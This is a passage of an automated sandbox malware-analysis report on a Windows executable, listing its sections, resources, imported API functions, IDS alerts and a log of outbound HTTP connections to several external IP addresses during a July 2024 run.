                                                          .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc0xd40000x547fc0x548003b4b5368d1a22b317a7abcf50ffcf01eFalse0.9228226701183432data7.881361748990998IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x1290000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                          RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                          RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                          RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                          RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                          RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                          RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                          RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                          RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                          RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                          RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                          RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                                                          RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                                                          RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                                                          RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                                                          RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                          RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                          RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                          RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                          RT_RCDATA0xdc7b80x4bac2data1.0003258548042613
                                                          RT_GROUP_ICON0x12827c0x76dataEnglishGreat Britain0.6610169491525424
                                                          RT_GROUP_ICON0x1282f40x14dataEnglishGreat Britain1.25
                                                          RT_GROUP_ICON0x1283080x14dataEnglishGreat Britain1.15
                                                          RT_GROUP_ICON0x12831c0x14dataEnglishGreat Britain1.25
                                                          RT_VERSION0x1283300xdcdataEnglishGreat Britain0.6181818181818182
                                                          RT_MANIFEST0x12840c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                          Imports

                                                          DLLImport
                                                          WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                          VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                          WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                          WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                          PSAPI.DLLGetProcessMemoryInfo
                                                          IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                          USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                          UxTheme.dllIsThemeActive
                                                          KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                                                          USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                                                          GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                                                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                          ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                                                          SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                                                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                          OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                                                          Possible Origin

                                                          Language of compilation systemCountry where language is spokenMap
                                                          EnglishGreat Britain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                          2024-07-26T18:45:24.949358+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435513620.114.59.183192.168.2.5
                                                          2024-07-26T18:45:27.280649+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4435513720.114.59.183192.168.2.5
                                                          2024-07-26T18:45:15.652468+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434970520.114.59.183192.168.2.5

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Jul 26, 2024 18:45:50.672553062 CEST5513880192.168.2.5178.212.35.248
                                                          Jul 26, 2024 18:45:50.684822083 CEST8055138178.212.35.248192.168.2.5
                                                          Jul 26, 2024 18:45:50.684923887 CEST5513880192.168.2.5178.212.35.248
                                                          Jul 26, 2024 18:45:50.700043917 CEST5513880192.168.2.5178.212.35.248
                                                          Jul 26, 2024 18:45:50.705244064 CEST8055138178.212.35.248192.168.2.5
                                                          Jul 26, 2024 18:45:51.754302025 CEST8055138178.212.35.248192.168.2.5
                                                          Jul 26, 2024 18:45:51.755496025 CEST8055138178.212.35.248192.168.2.5
                                                          Jul 26, 2024 18:45:51.755661011 CEST5513880192.168.2.5178.212.35.248
                                                          Jul 26, 2024 18:45:51.770190954 CEST8055138178.212.35.248192.168.2.5
                                                          Jul 26, 2024 18:45:51.770272017 CEST5513880192.168.2.5178.212.35.248
                                                          Jul 26, 2024 18:45:51.772945881 CEST5513880192.168.2.5178.212.35.248
                                                          Jul 26, 2024 18:45:51.778631926 CEST8055138178.212.35.248192.168.2.5
                                                          Jul 26, 2024 18:46:11.931276083 CEST5513980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:11.936630011 CEST805513984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:11.936724901 CEST5513980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:11.955506086 CEST5513980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:11.960630894 CEST805513984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:12.417583942 CEST805513984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:12.417695999 CEST5513980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:13.464524031 CEST5513980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:13.634340048 CEST805513984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:14.498045921 CEST5514080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:14.505042076 CEST805514084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:14.505320072 CEST5514080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:14.524668932 CEST5514080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:14.534264088 CEST805514084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:14.990751028 CEST805514084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:14.990839958 CEST5514080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:16.027060032 CEST5514080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:16.039032936 CEST805514084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:17.061461926 CEST5514180192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:17.066759109 CEST805514184.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:17.066876888 CEST5514180192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:17.093008995 CEST5514180192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:17.098565102 CEST805514184.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:17.099091053 CEST805514184.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:17.575200081 CEST805514184.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:17.575273037 CEST5514180192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:18.605390072 CEST5514180192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:18.611849070 CEST805514184.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:19.639908075 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:19.648899078 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:19.649000883 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:19.667263985 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:19.672401905 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.132971048 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.133296967 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.133308887 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.133407116 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:20.134790897 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.134804964 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.134934902 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:20.137044907 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.137059927 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.137068033 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.137094021 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:20.137121916 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:20.139771938 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.139789104 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.139801025 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.139836073 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:20.139863968 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:20.153614044 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:20.169612885 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.169629097 CEST805514284.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:20.169680119 CEST5514280192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:36.119509935 CEST5514380192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:36.125395060 CEST8055143104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:36.125463963 CEST5514380192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:36.144392014 CEST5514380192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:36.151156902 CEST8055143104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:36.946926117 CEST8055143104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:36.947254896 CEST8055143104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:36.947429895 CEST5514380192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:37.652072906 CEST5514380192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:38.697001934 CEST5514480192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:38.704102039 CEST8055144104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:38.704221010 CEST5514480192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:38.724800110 CEST5514480192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:38.730598927 CEST8055144104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:39.405570984 CEST8055144104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:39.406466007 CEST8055144104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:39.406541109 CEST5514480192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:40.231270075 CEST5514480192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:41.262577057 CEST5514580192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:41.267752886 CEST8055145104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:41.267853975 CEST5514580192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:41.296087980 CEST5514580192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:41.301266909 CEST8055145104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:41.301465034 CEST8055145104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:41.973759890 CEST8055145104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:41.974196911 CEST8055145104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:41.974251986 CEST5514580192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:42.809993982 CEST5514580192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:43.848866940 CEST5514680192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:43.868614912 CEST8055146104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:43.868716002 CEST5514680192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:43.892879009 CEST5514680192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:43.897835970 CEST8055146104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:44.535300970 CEST8055146104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:44.536451101 CEST8055146104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:44.536519051 CEST5514680192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:44.547205925 CEST5514680192.168.2.5104.21.59.240
                                                          Jul 26, 2024 18:46:44.553658009 CEST8055146104.21.59.240192.168.2.5
                                                          Jul 26, 2024 18:46:49.636842012 CEST5514780192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:49.645059109 CEST805514784.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:49.645242929 CEST5514780192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:49.663841963 CEST5514780192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:49.669523001 CEST805514784.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:50.159252882 CEST805514784.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:50.159868002 CEST5514780192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:51.168991089 CEST5514780192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:51.174101114 CEST805514784.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:52.216553926 CEST5514880192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:52.221721888 CEST805514884.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:52.224644899 CEST5514880192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:52.252620935 CEST5514880192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:52.257810116 CEST805514884.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:52.795417070 CEST805514884.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:52.800540924 CEST5514880192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:53.761634111 CEST5514880192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:53.770459890 CEST805514884.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:54.800702095 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:54.806032896 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:54.806778908 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:54.828394890 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:54.833399057 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:54.833617926 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:55.331340075 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:55.331428051 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:56.339808941 CEST5514980192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:56.345120907 CEST805514984.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.380570889 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.385555029 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.385631084 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.405827999 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.410840988 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913244963 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913407087 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913934946 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.913949966 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.914889097 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.914902925 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.914927959 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.915950060 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.916507959 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.918955088 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.919553995 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.919569016 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:46:57.919688940 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.919688940 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.931759119 CEST5515080192.168.2.584.32.84.32
                                                          Jul 26, 2024 18:46:57.937174082 CEST805515084.32.84.32192.168.2.5
                                                          Jul 26, 2024 18:47:02.990731001 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:02.995698929 CEST8055151188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:02.995923042 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:03.023267031 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:03.028551102 CEST8055151188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:04.528564930 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:04.534332037 CEST8055151188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:04.540548086 CEST5515180192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.564923048 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.570415974 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:05.570596933 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.591670036 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:05.597023010 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912610054 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912760019 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912795067 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.912805080 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:06.914153099 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.914184093 CEST8055152188.114.96.3192.168.2.5
                                                          Jul 26, 2024 18:47:06.914194107 CEST5515280192.168.2.5188.114.96.3
                                                          Jul 26, 2024 18:47:06.914788008 CEST8055152188.114.96.3192.168.2.5
